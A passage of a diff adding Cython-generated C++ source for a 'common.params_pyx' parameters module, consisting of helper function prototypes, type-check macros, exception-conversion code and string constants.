CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* PyObjectSetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_DelAttrStr(o,n) __Pyx_PyObject_SetAttrStr(o, n, NULL) +static CYTHON_INLINE int __Pyx_PyObject_SetAttrStr(PyObject* obj, PyObject* attr_name, PyObject* value); +#else +#define __Pyx_PyObject_DelAttrStr(o,n) PyObject_DelAttr(o,n) +#define __Pyx_PyObject_SetAttrStr(o,n,v) PyObject_SetAttr(o,n,v) +#endif + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* IncludeCppStringH.proto */ +#include + +/* decode_c_string_utf16.proto */ +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 0; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16LE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = -1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16BE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} + +/* decode_c_bytes.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)); + +/* decode_cpp_string.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_cpp_string( + std::string cppstring, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + return __Pyx_decode_c_bytes( + cppstring.data(), cppstring.size(), start, stop, encoding, errors, decode_func); +} + +/* RaiseClosureNameError.proto */ +static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname); + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* Py3UpdateBases.proto */ +static PyObject* __Pyx_PEP560_update_bases(PyObject *bases); + +/* SetNameInClass.proto */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? _PyDict_SetItem_KnownHash(ns, name, value, ((PyASCIIObject *) name)->hash) : PyObject_SetItem(ns, name, value)) +#elif CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? PyDict_SetItem(ns, name, value) : PyObject_SetItem(ns, name, value)) +#else +#define __Pyx_SetNameInClass(ns, name, value) PyObject_SetItem(ns, name, value) +#endif + +/* SetNewInClass.proto */ +static int __Pyx_SetNewInClass(PyObject *ns, PyObject *name, PyObject *value); + +/* CalculateMetaclass.proto */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases); + +/* PyObjectCall2Args.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); + +/* PyObjectLookupSpecial.proto */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_LookupSpecialNoError(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 0) +#define __Pyx_PyObject_LookupSpecial(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 1) +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error); +#else +#define __Pyx_PyObject_LookupSpecialNoError(o,n) __Pyx_PyObject_GetAttrStrNoError(o,n) +#define __Pyx_PyObject_LookupSpecial(o,n) __Pyx_PyObject_GetAttrStr(o,n) +#endif + +/* Py3ClassCreate.proto */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, PyObject *qualname, + PyObject *mkw, PyObject *modname, PyObject *doc); +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, PyObject *dict, + PyObject *mkw, int calculate_metaclass, int allow_py2_metaclass); + +/* Globals.proto */ +static PyObject* __Pyx_Globals(void); + +/* dict_getitem_default.proto */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value); + +/* UnpackUnboundCMethod.proto */ +typedef struct { + PyObject *type; + PyObject **method_name; + PyCFunction func; + PyObject *method; + int flag; +} __Pyx_CachedCFunction; + +/* CallUnboundCMethod1.proto */ +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#else +#define __Pyx_CallUnboundCMethod1(cfunc, self, arg) __Pyx__CallUnboundCMethod1(cfunc, self, arg) +#endif + +/* CallUnboundCMethod2.proto */ +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2); +#else +#define __Pyx_CallUnboundCMethod2(cfunc, self, arg1, arg2) __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2) +#endif + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE enum ParamKeyType __Pyx_PyInt_As_enum__ParamKeyType(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum__ParamKeyType(enum ParamKeyType value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "common.params_pyx" */ +static PyObject *__Pyx_OrderedDict = 0; +static PyObject *__Pyx_EnumBase = 0; +static PyObject *__Pyx_FlagBase = 0; +static PyObject *__Pyx_globals = 0; +static PyObject *__Pyx_Enum_ParamKeyType_to_py(enum ParamKeyType); /*proto*/ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &); /*proto*/ +static PyObject *__pyx_convert_vector_to_py_std_3a__3a_string(std::vector const &); /*proto*/ +static PyObject *__pyx_unpickle___Pyx_EnumMeta__set_state(struct __pyx_obj___Pyx_EnumMeta *, PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "common.params_pyx" +extern int __pyx_module_is_main_common__params_pyx; +int __pyx_module_is_main_common__params_pyx = 0; + +/* Implementation of "common.params_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_KeyboardInterrupt; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin_MemoryError; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_ValueError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ""; +static const char __pyx_k_d[] = "d"; +static const char __pyx_k_k[] = "k"; +static const char __pyx_k_r[] = "r"; +static const char __pyx_k_v[] = "v"; +static const char __pyx_k__3[] = "."; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_ALL[] = "ALL"; +static const char __pyx_k__21[] = "*"; +static const char __pyx_k__51[] = "?"; +static const char __pyx_k_cls[] = "cls"; +static const char __pyx_k_dat[] = "dat"; +static const char __pyx_k_dct[] = "dct"; +static const char __pyx_k_doc[] = "__doc__"; +static const char __pyx_k_get[] = "get"; +static const char __pyx_k_key[] = "key"; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_put[] = "put"; +static const char __pyx_k_res[] = "res"; +static const char __pyx_k_s_s[] = "%s.%s"; +static const char __pyx_k_str[] = "__str__"; +static const char __pyx_k_val[] = "val"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_enum[] = "enum"; +static const char __pyx_k_init[] = "__init__"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "name"; +static const char __pyx_k_repr[] = "__repr__"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_block[] = "block"; +static const char __pyx_k_class[] = "__class__"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_s_s_d[] = "<%s.%s: %d>"; +static const char __pyx_k_start[] = "start"; +static const char __pyx_k_state[] = "state"; +static const char __pyx_k_super[] = "super"; +static const char __pyx_k_value[] = "value"; +static const char __pyx_k_Params[] = "Params"; +static const char __pyx_k_Thread[] = "Thread"; +static const char __pyx_k_decode[] = "decode"; +static const char __pyx_k_dict_2[] = "_dict"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_module[] = "__module__"; +static const char __pyx_k_name_2[] = "__name__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_remove[] = "remove"; +static const char __pyx_k_target[] = "target"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_values[] = "values"; +static const char __pyx_k_IntEnum[] = "IntEnum"; +static const char __pyx_k_IntFlag[] = "IntFlag"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_members[] = "__members__"; +static const char __pyx_k_parents[] = "parents"; +static const char __pyx_k_prepare[] = "__prepare__"; +static const char __pyx_k_tx_type[] = "tx_type"; +static const char __pyx_k_EnumBase[] = "EnumBase"; +static const char __pyx_k_EnumType[] = "EnumType"; +static const char __pyx_k_all_keys[] = "all_keys"; +static const char __pyx_k_encoding[] = "encoding"; +static const char __pyx_k_get_bool[] = "get_bool"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char 